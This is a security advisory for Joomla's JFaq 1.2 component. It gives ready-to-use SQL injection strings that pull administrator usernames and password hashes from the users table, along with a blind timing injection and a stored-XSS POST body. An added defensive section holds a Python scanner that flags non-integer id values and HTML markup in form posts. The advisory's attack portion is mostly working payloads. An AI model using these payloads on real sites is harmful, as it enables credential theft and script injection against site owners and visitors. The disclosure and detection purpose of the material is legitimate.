Joomla Component JFaq 1.2 Multiple Vulnerabilities

2010.07.01
Credit: jdc
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79, CWE-89

# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5

"title" input SQL injection
---------------------------

title', (select concat(username,char(32),password) from #__users where gid=25 limit 1), 1, 1, 1, 1, 1) -- '

id SQL injection
----------------

requires: magic quotes OFF, Joomla debug mode OFF

?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 from jos_users where gid=25 -- '

id Blind SQL injection
----------------------

requires: magic quotes OFF

?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '

Persistent XSS
--------------

requires: a method to manually POST to form

postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"

NOTE: cannot be manually input - editor script strips exploit
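For defenders reviewing traffic to a site that still runs this component, the following added example (not part of the original advisory) flags com_jfaq requests whose id parameter is not a plain integer and add2 form posts that carry HTML markup. The function names and sample requests are constructed for illustration, and the check assumes legitimate ids are non-negative integers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Form fields named in the advisory's add2 postdata.
FORM_FIELDS = ("visitor_name", "titlu", "question")
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)  # start of any HTML tag

def check_query(url):
    """Return a finding for a com_jfaq request URL, or None."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_jfaq":
        return None
    for value in params.get("id", []):
        # Assumption: a legitimate id is a non-negative integer.
        if not re.fullmatch(r"\d+", value):
            return "non-integer id: %r" % value
    return None

def check_post(body):
    """Return a finding for a urlencoded com_jfaq add2 body, or None."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("option", [""])[0] != "com_jfaq":
        return None
    if form.get("task", [""])[0] != "add2":
        return None
    for field in FORM_FIELDS:
        for value in form.get(field, []):
            if MARKUP.search(value):
                return "markup in %s" % field
    return None

# Constructed sample requests: (method, URL, urlencoded body).
SAMPLE_REQUESTS = [
    ("GET", "/index.php?option=com_jfaq&task=detail&id=7", ""),
    ("GET", "/index.php?option=com_jfaq&task=categ&id=-1%27%20--%20%27", ""),
    ("POST", "/index.php", "option=com_jfaq&task=add2&visitor_name=foo"
                           "&categ=1&titlu=bar&question=%3Cimg%20src%3D%22f%22%3E"),
    ("POST", "/index.php", "option=com_jfaq&task=add2&visitor_name=foo"
                           "&categ=1&titlu=bar&question=How+do+I+reset+it%3F"),
]

def scan(requests):
    """Return (method, url, finding) for every flagged request."""
    findings = []
    for method, url, body in requests:
        hit = check_query(url) or (check_post(body) if method == "POST" else None)
        if hit:
            findings.append((method, url, hit))
    return findings
```

The "title" input injection is not covered here: a quote character is legitimate in a question title, so that issue has to be fixed where the component builds its INSERT statement rather than detected in traffic.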

References:

http://www.securityfocus.com/bid/41029
http://secunia.com/advisories/40219
http://packetstormsecurity.org/1006-exploits/joomlajfaq-sqlxss.txt
http://osvdb.org/65695

